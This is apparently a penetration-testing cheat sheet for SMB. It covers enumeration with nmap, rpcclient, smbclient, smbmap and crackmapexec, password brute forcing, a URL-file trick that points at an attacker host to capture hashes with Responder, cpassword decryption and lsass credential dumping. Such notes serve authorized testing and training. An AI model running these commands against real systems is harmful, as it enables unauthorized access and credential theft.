Server Message Block
Footprinting The Service
Nmap
sudo nmap 10.129.14.128 -sV -sC -p139,445

RPCclient
rpcclient -U "" 10.129.14.128

rpcclient -U'%' 10.10.110.17

-U'%'
: Explicitly sends an empty username and no password. -N
: Does not send any username or password, attempting to establish a null session.srvinfo
Server information.
enumdomains
Enumerate all domains that are deployed in the network.
querydominfo
Provides domain, server, and user information of deployed domains.
netshareenumall
Enumerates all available shares.
netsharegetinfo <share>
Provides information about a specific share.
enumdomusers
Enumerates all domain users.
queryuser <RID>
Provides information about a specific user.
Search For Known SMB Version Vulnerabilities
Check For Shares Using Null Sessions
smbclient -N -L //$ip/
cme smb $ip --shares -u "guest" -p ""
Brute Forcing
cme smb $ip -u users.list -p pws.list --local-auth | grep '[+]'

URL File attacks
Test for URL File attacks by creating a file called "@somename.url" with the following contents, upload, spin up smbserver to capture hash
[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\EnterAttackerip\%USERNAME%.icon
IconIndex=1
Run Responder to capture hashes
/opt/Responder-3.1.3.0/Responder.py -I tun0
Read / Upload access
Attempt to download and view share contents using valid credential / anonymous login / null session
smbmap -H $ip

smbmap -H $ip -r

smbmap
with the -r
or -R
(recursive) option, one can browse the directoriessmbmap -H 10.129.14.128 --download "notes\note.txt"

smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"

smbmap -u guest -p "" -H $ip -A '.*' -R
Cpassword discovery
Search "Groups.xml" for cpassword decryption
gpp-decrypt cpassword
lsass.zip lsass.dmp
search lsass.zip or lsass.dmp to use to dump credentials / keys / tickets
pypykatz lsa minidump "lsass.zip"
Alternate Data Streams (ADS)
test for alternate data streams after discovering 0 byte files
allinfo filename
Check Password Policy
cme smb $ip --pass-pol -u guest -p ""
User Discovery
Check For users using valid credential / anonymous login / null session
cme smb $ip --users -u guest -p ""
cme smb $ip --rid-brute -u guest -p ""
Group discovery
check for groups using valid credential / anonymous login / null session
cme smb $ip --groups -u guest -p ""
Smbclient
Interactively access the smb shares using smbclient
smbclient //$ip/someshare -N
smbclient //$ip/someshare -U 'guest' -N
smbclient //$ip/someshare -U 'validuser' -p 'validpass'
Smbmap
// Some code
Dangerous Settings
browseable = yes
Allow listing available shares in the current share?
read only = no
Forbid the creation and modification of files?
writable = yes
Allow users to create and modify files?
guest ok = yes
Allow connecting to the service without using a password?
enable privileges = yes
Honor privileges assigned to specific SID?
create mask = 0777
What permissions must be assigned to the newly created files?
directory mask = 0777
What permissions must be assigned to the newly created directories?
logon script = script.sh
What script needs to be executed on the user's login?
magic script = script.sh
Which script should be executed when the script gets closed?
magic output = script.out
Where the output of the magic script needs to be stored?
Last updated